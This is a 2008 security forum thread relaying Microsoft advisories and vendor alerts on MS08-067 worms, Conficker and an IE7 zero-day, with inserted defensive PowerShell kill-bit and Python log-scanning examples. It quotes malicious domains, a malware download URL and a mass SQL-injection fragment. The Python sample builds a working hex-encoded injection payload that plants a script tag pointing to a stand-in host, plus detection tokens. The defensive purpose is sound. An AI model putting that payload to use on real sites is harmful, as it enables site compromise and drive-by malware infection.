Last Updated: 2008-10-14 18:30:09 UTC

AplusWebMaster
2008-10-14, 21:59
FYI...

Microsoft Security Advisory (956391)
Cumulative Security Update of ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/956391.mspx
October 14, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory...
This update sets the kill bits for the following third-party software:
• Microgaming Download Helper...
• System Requirements Lab...
• PhotoStockPlus Uploader Tool...
This update sets the kill bits for ActiveX controls addressed in previous Microsoft Security Bulletins. These kill bits are being set in this update as a defense in depth measure:
• Unsafe Functions in Office Web Components (328130), MS02-044.
• Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (933103), MS08-017.
• Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617), MS08-041.
• Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), MS08-052.
For more information about installing this update, see Microsoft Knowledge Base Article 956391*."
* http://support.microsoft.com/kb/956391
Last Review: October 14, 2008

:spider:
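Both the Symantec note on MS08-053 (set the kill bit on CLSID A8D3AD02-7508-4004-B2E9-AD33F087F43C until the patch is on) and Advisory 956391 above rely on the same mechanism: a per-CLSID "Compatibility Flags" value under the ActiveX Compatibility key that stops Internet Explorer from instantiating the control. The script below is an added example, not code from the thread, Symantec or Microsoft. It audits and sets that bit for a given CLSID; the registry path and the 0x400 flag value are the ones documented in Microsoft KB240797, and the CLSID used at the end is the one quoted in the Symantec text.

```powershell
# Added example (not from the thread, Symantec or Microsoft): audit or set the
# ActiveX "kill bit" for one CLSID. Registry location and flag value follow
# Microsoft KB240797. Writing HKLM needs an elevated PowerShell session.

$KillBitFlag = 0x400   # COMPAT_FLAG_KILLBIT: IE refuses to instantiate the control

function Get-ActiveXCompatPath {
    param([Parameter(Mandatory)][string]$Clsid)
    # Normalise to the upper-case, brace-wrapped form the registry uses
    $c = $Clsid.Trim().Trim('{', '}').ToUpper()
    if ($c -notmatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
        throw "Not a valid CLSID: $Clsid"
    }
    return "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{$($c)}"
}

function Test-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    $path = Get-ActiveXCompatPath $Clsid
    if (-not (Test-Path $path)) { return $false }
    $flags = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBitFlag) -ne 0)
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    $path = Get-ActiveXCompatPath $Clsid
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    # OR the bit in so any compatibility flags already present survive
    $new = $existing -bor $KillBitFlag
    Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value $new -Type DWord
    return (Test-ActiveXKillBit $Clsid)
}

# CLSID of the vulnerable Windows Media Encoder control quoted in the thread
$wmexClsid = 'A8D3AD02-7508-4004-B2E9-AD33F087F43C'
if (Test-ActiveXKillBit $wmexClsid) {
    Write-Output "Kill bit already set for {$wmexClsid}"
} else {
    Write-Output ("Kill bit set: " + (Set-ActiveXKillBit $wmexClsid))
}
```

On 64-bit Windows the 32-bit Internet Explorer reads the same key under HKLM:\SOFTWARE\Wow6432Node\..., so an audit should check both paths. The kill bit only stops IE from loading the control; it does not remove the vulnerable DLL, so the MS08-053 update still has to be applied.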

AplusWebMaster
2008-10-23, 15:48
FYI...

MS out-of-band patch - Critical
- http://isc.sans.org/diary.html?storyid=5227
Last Updated: 2008-10-23 12:16:16 UTC - "Microsoft has just released an advance notification* of an out-of-band update to be released on 23rd of October. They will hold a special webcast on the 23rd at 1:00 pm PT to discuss the release. The patch will be released at 10.00 am. The information in the bulletin mentions a remote code exploit, but no further details are provided, however a restart will be required. Microsoft rates the issue as -critical- for 2000/XP/2003 and important for vista/2008. If we get more information we'll update this diary."
* http://www.microsoft.com/technet/security/bulletin/ms08-oct.mspx
Critical (1)
Microsoft Security Bulletin to be issued: October 23, 2008
Windows Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

>>> http://forums.spybot.info/showthread.php?p=246351#post246351

:fear:

AplusWebMaster
2008-10-23, 23:56
FYI...

Microsoft Security Bulletin MS08-067
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
- http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx
October 23, 2008 - "...This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit..."
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
Exploitability Index: 1 - Consistent exploit code likely...

- http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx
October 23, 2008
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

---
MS08-067 - exploit in the wild
- http://www.symantec.com/security_response/threatconlearn.jsp
Oct. 23, 2008 - "The ThreatCon is currently at Level 2: Elevated. The DeepSight Threat Analysis Team has updated the ThreatCon to Level 2. Microsoft has released an out-of-band security bulletin to address a Critical flaw in the Server Service (SVRSVC). The vulnerability occurs because of a failure in processing malformed RPC packets sent to the service. By default this issue can be exploited without authentication on Windows 2000, Windows XP, and Windows 2003. Both Windows Vista and Windows Server 2008 are vulnerable, but require authentication by default.
MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
According to the bulletin this vulnerability is being actively exploited in the wild..."
---

- http://securitylabs.websense.com/content/Alerts/3218.aspx
10.23.2008

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
10.23.2008

- http://secunia.com/advisories/32326
Release Date: 2008-10-23
Critical: Highly critical
Impact: System access...

- http://isc.sans.org/diary.html?storyid=5227
Last Updated: 2008-10-23 20:58:46 UTC ...Version: 3
"...we believe that client computers need to be updated with all due haste..."

:fear:

AplusWebMaster
2008-10-28, 05:14
FYI...

Microsoft Security Advisory (958963)
Exploit Code Published Affecting the Server Service
- http://www.microsoft.com/technet/security/advisory/958963.mspx
October 27, 2008 - "Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067*. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue. Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

:fear:

AplusWebMaster
2008-10-30, 22:28
FYI...

Vista updates KB957200 and KB953155
- http://isc.sans.org/diary.html?storyid=5258
Last Updated: 2008-10-30 14:02:45 UTC - "...A few readers are writing in to ask about two recent updates appearing in their queue: KB957200 and KB953155.

KB957200* is listed as a reliability update and according to Microsoft: "this update resolves some performance and reliability issues in Windows Vista. By applying this update, you can achieve better performance and responsiveness in various scenarios. After you install this item, you may have to restart your computer."
* http://support.microsoft.com/kb/957200/en-us

KB953155** is a security update related to MS08-062..."
** http://support.microsoft.com/kb/953155/en-us
Last Review: October 14, 2008
- http://www.microsoft.com/technet/security/bulletin/ms08-062.mspx
Updated: October 29, 2008
Version: 2.2...
"...There were no changes to the security update binaries..."

:fear:

AplusWebMaster
2008-11-01, 20:37
FYI...

- http://www.f-secure.com/weblog/archives/00001525.html
October 31, 2008 - " We are seeing the first Proof of Concept binaries that target the MS08-067 vulnerability on the following English localized systems:
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows 2003 Service Pack 2
The payload is encrypted as normal. Its function is to add the guest account to the administrators group, thus allowing unlimited access to the machine. We detect the binaries as follows:
Backdoor:W32/Agent.DIN
Backdoor:W32/Agent.DIO
Backdoor:W32/Agent.DIP
We'll continue to keep an eye on the events."

:fear: :fear:

AplusWebMaster
2008-11-03, 17:34
FYI...

Worm Exploiting MS08-067 in the Wild
- http://www.f-secure.com/weblog/archives/00001526.html
November 3, 2008 - "Code building on the proof of concept binaries that were mentioned last week has moved into the wild. We've received the first reports of a worm capable of exploiting the MS08-067 vulnerability. The exploit payload downloads a dropper that we detect as Trojan-Dropper.Win32.Agent.yhi. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g and the kernel component as Rootkit.Win32.KernelBot.dg."

Also see: http://isc.sans.org/diary.html?storyid=5275
Last Updated: 2008-11-03 18:54:56 UTC ...(Version: 3)

:fear:

AplusWebMaster
2008-11-03, 23:46
FYI...

- http://www.theregister.co.uk/2008/11/03/microsoft_intelligence_report/
3 November 2008 - "Malware and unwanted software made strides in the first half of 2008, according to the latest security intelligence report from Microsoft, which tallied a 43 percent increase in the number of programs exorcised by the company's malicious software removal tool. In the first six months of this year, there were some 62 million disinfections on 23.8 million machines, according to the report which was published* Monday. In the second half of last year, 42 million programs were removed on 15 million computers. Because it runs on hundreds of millions of machines worldwide, Microsoft's MSRT, or malicious software removal tool, functions as something of a bellwether for the state of successful attacks affecting Windows computers. The increase was driven in part by the addition of new strains of malware that the MSRT checks for, said Jeff Williams, principal architect for the Microsoft Malware Protection Center. Win32/Taterf, a family of worms that steals login credentials for a host of online games, was one such addition and was removed 2.7 million times. Other causes included the growing aggressiveness of established malware families. Win32/Zlob, a trojan that has bedeviled Windows users for years, was removed 7.5 million times..."
* http://www.microsoft.com/sir

:fear:

AplusWebMaster
2008-11-04, 17:48
More detail...

- http://asert.arbornetworks.com/2008/11/ms08-067-used-to-drop-ddos-bots/
November 3, 2008 - "...The exploit code is 67.exe, and the bot itself is 6767.exe. KernelBot is a Chinese origin DDoS bot... We first became aware of this bot during the CNN.Com attacks earlier this year... If you want to stop this one, you should block all web access to the domain ushealthmart .com. It’s using a few hosts under that domain name to spread and send out configurations... KernelBot can send ICMP, TCP SYN, UDP, and even HTTP flood attacks, among others. It communicates with a server to retrieve the file, usually named “cmd.txt”, which itself is a large INI file describing attacks and next actions..."

- http://isc.sans.org/diary.html?storyid=5288
Last Updated: 2008-11-05 02:53:31 UTC - "...exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445 looking for vulnerable systems so blocking it at your enterprise gateway is recommended."

:fear:

AplusWebMaster
2008-11-06, 20:58
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 6, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on November 11, 2008... (Total of -2-)

Critical (1)

Windows Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Microsoft Office...

Important (1)

Windows Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows..."

AplusWebMaster
2008-11-11, 20:58
FYI...

Hacker tool targeting MS08-067 vuln
- http://securitylabs.websense.com/content/Blogs/3237.aspx
11.11.2008 - "Websense... has noticed a special hacker tool in China. In the past few weeks, Microsoft has announced and released a patch for the MS08-067 vulnerability, and a hacker tool named "wolfteeth bot catcher" has been widely used by hackers to attack machines running Windows operating systems -without- the KB958644 patch... First, the tool drops and runs a backdoor named bycnboy.exe, which moves itself to the system folder and is renamed to windef.exe. This means that hackers who used this tool were themselves hacked by the tool's author. Then a file named project.exe is placed in the temp folder and loaded to run once the original file has finished its job... a Trojan file from the user-defined Web site could be downloaded and executed. All the vulnerable IPs are controlled remotely..."

(Screenshots and more detail available at the URL above.)

:fear:

AplusWebMaster
2008-11-11, 20:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 11, 2008 - "This bulletin summary lists security bulletins released for November 2008... (Total of -2-)

Critical (1)

Microsoft Security Bulletin MS08-069
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (1)

Microsoft Security Bulletin MS08-068
Vulnerability in SMB Could Allow Remote Code Execution (957097)
- http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5330
Last Updated: 2008-11-11 18:28:39 UTC

AplusWebMaster
2008-11-26, 19:23
FYI...

- http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx
November 25, 2008 5:37 PM - "As expected, we are seeing another wave of attacks exploiting the vulnerability detailed in security bulletin MS08-067. Early last week... the number of exploits in the wild was still low and they were mostly targeted attacks. However, during the weekend we started receiving customer reports for new malware that exploits this vulnerability. During the last two days that malware gained momentum and as a result we see an increased support call volume... This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll. It is also interesting to note that the worm patches the vulnerable API in memory so the machine will not be vulnerable anymore... We have also found several bots that exploit MS08-067... We continue to urge all our customers to install MS08-067*..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
CVSS v2 Base Score: 10.0 (HIGH)...
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service...
- http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A
"...Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately..."

:fear::fear:

AplusWebMaster
2008-12-01, 03:24
FYI...

- http://blog.trendmicro.com/downad-gearing-up-for-a-botnet/
Nov. 30, 2008 - "A few days ago, Trend Micro got wind of a .DLL worm detected as WORM_DOWNAD.A that exploits the MS08-067 vulnerability. Its routines have led our security analysts to postulate that it is a key component in the development of a new botnet. Initially thought to be working in conjunction with a NETWORM variant, WORM_DOWNAD.A is now believed to be an updated version of an attack from the same criminal botnet gang. Fresh reports, however, suggest that this threat seems to have gone wider and has even extended its reach around the globe. More than 500,000 unique hosts have since been discovered to have fallen victim to this threat. These infected hosts are spread across different countries and as a random check by Trend Micro... revealed, they can be found in service provider networks in the U.S., China, India, the Middle East, Europe, and Latin America — several residential broadband providers appear to have a larger number of infected customers..."

:fear::mad::fear:

AplusWebMaster
2008-12-05, 07:07
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 4, 2008
"This is an advance notification of security bulletins that Microsoft is intending to release on December 9, 2008... (Total of - 8 -)

Bulletin ID - Maximum Severity Rating and Vulnerability Impact - Restart Requirement - Affected Software

(Critical - 6)
Windows 1 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
Windows 2 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
IE - Critical - Remote Code Execution - Requires restart - Microsoft Windows, Internet Explorer
VB - Critical - Remote Code Execution - Requires restart - Microsoft Developer Tools and Software, Microsoft Office
Word - Critical - Remote Code Execution - Does not require restart - Microsoft Office
Excel - Critical - Remote Code Execution - Does not require restart - Microsoft Office
____

(Important - 2)
SharePoint - Important - Elevation of Privilege - Does not require restart - Microsoft Office, Microsoft Server Software
WMC - Important - Remote Code Execution - May require restart - Microsoft Windows
...

- http://www.us-cert.gov/current/#microsoft_releases_advanced_notification_for2
December 5, 2008 at 09:53 am - "... the December release cycle will contain eight bulletins, six of which will have a severity rating of Critical. The notification states that these Critical bulletins are for Microsoft Windows, Internet Explorer, and Office. There will also be two Important bulletins for Microsoft Windows and Office..."

AplusWebMaster
2008-12-10, 01:20
FYI...

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 - "Microsoft is investigating new reports of a vulnerability in the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are -not- affected as these operating systems do not contain the vulnerable code. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability..."

- http://isc.sans.org/diary.html?storyid=5461
Last Updated: 2008-12-10 11:38:37 UTC

- http://blog.trendmicro.com/a-wordpad-of-caution/
Dec. 15, 2008 - "...The exploit works by using a specially-crafted .DOC, .WRI, or .RTF file to take advantage of the WordPad vulnerability, thereby causing the said application to crash. This crash may then allow a remote malicious user to take control of an affected system..."

- http://www.microsoft.com/technet/security/advisory/960906.mspx
• December 15, 2008: Updated the workaround, Disable the WordPad Text Converter for Word 97.

:fear:

AplusWebMaster
2008-12-10, 01:46
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
Published: December 9, 2008 - "This bulletin summary lists security bulletins released for December 2008... security bulletins for this month in order of severity... ( Total of - 8 - )

Critical (6)

Microsoft Security Bulletin MS08-071
Vulnerabilities in GDI Could Allow Remote Code Execution (956802)
- http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-075
Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-075.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-073
Cumulative Security Update for Internet Explorer (958215)
- http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-070
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Severity Rating: Critical
Affected Software: Microsoft Developer Tools and Software, Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-072
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)
- http://www.microsoft.com/technet/security/bulletin/ms08-072.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-074
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070)
- http://www.microsoft.com/technet/security/bulletin/ms08-074.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Important (2)

Microsoft Security Bulletin MS08-077
Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
- http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx
Severity Rating: Important
Affected Software: Microsoft Office, Microsoft Server Software...
Vulnerability Impact: Elevation of Privilege...

Microsoft Security Bulletin MS08-076
Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
Severity Rating: Important
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...
_____

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5449
Last Updated: 2008-12-09 20:36:04 UTC
_____

- http://preview.tinyurl.com/5oqpcj
December 9, 2008 (Computerworld) - "(MS)... patched 28 vulnerabilities... the biggest batch of fixes it has issued since it switched to a regular monthly update schedule more than five years ago. Of the 28 bugs quashed today, Microsoft ranked 23 of them critical..."

:fear:

AplusWebMaster
2008-12-10, 14:12
FYI...

IE XML processing memory corruption
- http://secunia.com/advisories/33089/
Release Date: 2008-12-10
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x...
...Successful exploitation allows execution of arbitrary code.
NOTE: Reportedly, the vulnerability is currently being actively exploited.
The vulnerability is confirmed in Internet Explorer 7 on a fully patched Windows XP SP3. Other versions may also be affected.
Solution: Do not browse untrusted websites or follow untrusted links.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-10 09:38:03 UTC

- https://forums.symantec.com/syment/blog/article?blog.id=vulnerabilities_exploits&message.id=180#M180
12-10-2008 - "...We also recommend blocking the following hosts at network boundaries:
• wwwwyyyyy.cn
• sllwrnm5.cn
• baikec.cn
• oiuytr.net *
• laoyang4.cn
• cc4y7.cn ..."

* example: https://safeweb.norton.com/report/show?name=oiuytr.net

:fear::fear:

AplusWebMaster
2008-12-11, 12:45
FYI...

- http://securitylabs.websense.com/content/Alerts/3259.aspx
12.10.2008 - "...No user interaction is necessary for the exploit to be successful. A computer may become infected by simply visiting a malicious Web site. This vulnerability exists in the way XML is processed within Internet Explorer 7..."

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...Update: Microsoft published a bulletin regarding this issue*... In addition, shadowserver.org published a list of infected sites**. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7...

* http://www.microsoft.com/technet/security/advisory/961051.mspx
December 10, 2008 - "...Suggested Actions... Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors...
• Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones...
• Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone...
• Enable DEP for Internet Explorer 7...

IE7 0-Day Exploit Sites
** http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
10 December 2008 - "...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."

> http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...UPDATE 2: ...we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565 , for example). The important part includes the target URL that is injected:
… rtrim(convert(varchar(4000),['+@C+']))+''<script src=http ://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM …
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm ... If executed successfully, the script will download the binary from http ://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection ( http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a ) – there are some big names still missing it. In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed."

_____

- http://securitylabs.websense.com/content/Alerts/3260.aspx
12.11.2008 - "Websense... has discovered that the Taiwanese search engine "look.tw" has been compromised and is infecting site visitors with malicious code. The Web site has been injected with a recently announced Internet Explorer 7 Zero Day Attack ( http://securitylabs.websense.com/content/Alerts/3259.aspx ). The exploit on the site attempts to download a malicious executable called "ieupdate.exe". The download location is currently down, but could come back at any moment."

:fear::fear::mad::mad:
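
The ISC diary quoted above shows the injected T-SQL fragment (the cursor loop that appends a <script src=...> tag to every varchar column) arriving in web requests. Added example, not code from ISC, Websense or this thread: a Python detector that URL-decodes request URLs from web-server log lines, decodes any long 0x... hex literal in them (the DECLARE/CAST(0x...)/EXEC() wrapper is an assumption based on how the 2008 mass SQL-injection wave delivered such payloads, not something quoted in the thread), and flags the tokens seen in the quoted payload. The log lines and the bad.example domain are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Substrings from the injected T-SQL cursor loop quoted in the ISC diary
# (FETCH NEXT FROM ... rtrim(convert(varchar(4000),...)) + '<script src=...>'),
# plus the DECLARE/CAST(0x...)/EXEC() wrapper (assumption: typical of the 2008
# mass-SQL-injection wave, not quoted in this thread).
SUSPICIOUS_TOKENS = (
    "fetch next from",
    "convert(varchar",
    "rtrim(",
    "<script src=",
    "declare @",
    "cast(0x",
    "exec(",
)

HEX_BLOB = re.compile(r"0x([0-9a-fA-F]{40,})")          # long hex literal = encoded payload
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')


def decode_hex_blobs(text):
    """Return the decoded text of every long 0x... hex literal found in text."""
    out = []
    for m in HEX_BLOB.finditer(text):
        h = m.group(1)
        if len(h) % 2:          # a trailing stray hex digit would break fromhex()
            h = h[:-1]
        raw = bytes.fromhex(h)
        if raw.count(b"\x00") > len(raw) // 4:   # many NULs: nvarchar (UTF-16LE) payload
            out.append(raw.decode("utf-16-le", errors="replace"))
        else:                                   # varchar payload: plain 8-bit text
            out.append(raw.decode("latin-1"))
    return out


def analyse_request(url):
    """URL-decode one request and return the sorted list of suspicious tokens found."""
    decoded = unquote_plus(url)
    views = [decoded] + decode_hex_blobs(decoded)   # look at the URL and inside its hex blobs
    found = set()
    for view in views:
        low = view.lower()
        found.update(tok for tok in SUSPICIOUS_TOKENS if tok in low)
    return sorted(found)


def scan_log(lines):
    """Return (url, tokens) for every log line whose request carries injection tokens."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        tokens = analyse_request(m.group(1))
        if tokens:
            hits.append((m.group(1), tokens))
    return hits


# Constructed sample payload modelled on the quoted fragment (bad.example is a placeholder).
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))"
    "+''<script src=http://bad.example/1.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END"
)
INJECTED_URL = (
    "/news.asp?id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + INJECTED_SQL.encode("latin-1").hex()
    + "%20AS%20VARCHAR(4000));EXEC(@S);--"
)
# Constructed web-server log lines: one normal request, one carrying the injection.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2008:10:00:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [11/Dec/2008:10:00:07 +0000] "GET ' + INJECTED_URL + ' HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for url, tokens in scan_log(SAMPLE_LOG):
        print("suspicious request:", url[:60] + "...", tokens)
```

The detector is deliberately keyed on the payload's own structure rather than on the domain in the script tag, because the diary notes the domain was not yet on any blocklist when the injections were seen; a domain list can be layered on top once one exists.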

AplusWebMaster
2008-12-12, 13:43
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
Revisions:
• December 10, 2008: Advisory published
• December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds...
- Workarounds...
• Use ACL to disable OLEDB32.DLL...
• Unregister OLEDB32.DLL...
• Disable Data Binding support in Internet Explorer 8...

• December 15, 2008: Updated the workarounds, Disable XML Island functionality and Disable Row Position functionality of OLEDB32.dll.
...Registry Editor...

- http://support.microsoft.com/kb/961051
Last Review: December 14, 2008 - Revision: 3.0

:fear: :lip:

AplusWebMaster
2008-12-12, 13:56
FYI...

MSIE 0-day Spreading Via SQL Injection
- http://isc.sans.org/diary.html?storyid=5464
Last Updated: 2008-12-12 01:00:18 UTC

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 12/11/08 12:05:32 -0400

IE7 0day expanded to include IE6 and IE8(beta)
- http://isc.sans.org/diary.html?storyid=5470
Last Updated: 2008-12-12 01:26:35 UTC

- http://securitylabs.websense.com/content/alerts.aspx
Date Description
12.12.2008 - ABIT China Web site Attacked by IE7 Zero Day
12.11.2008 - Taiwanese Search Engine, Look, Infected with IE 7 Zero Day

:fear::fear:

AplusWebMaster
2008-12-12, 17:47
Blocks...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...It turns out the domain that ISC reported on is also dropping some pretty nasty malware. The domain "17gamo .com" is serving up the exploits which attempt to download malware from "www .steoo .com". Please do not visit either of these sites. If successful the exploits will install a Gh0st RAT on the system. This trojan is currently using the DNS name "evetlog .3322 .org" and is beaconing to tcp port 3020.
We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it relates to this threat the following:
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
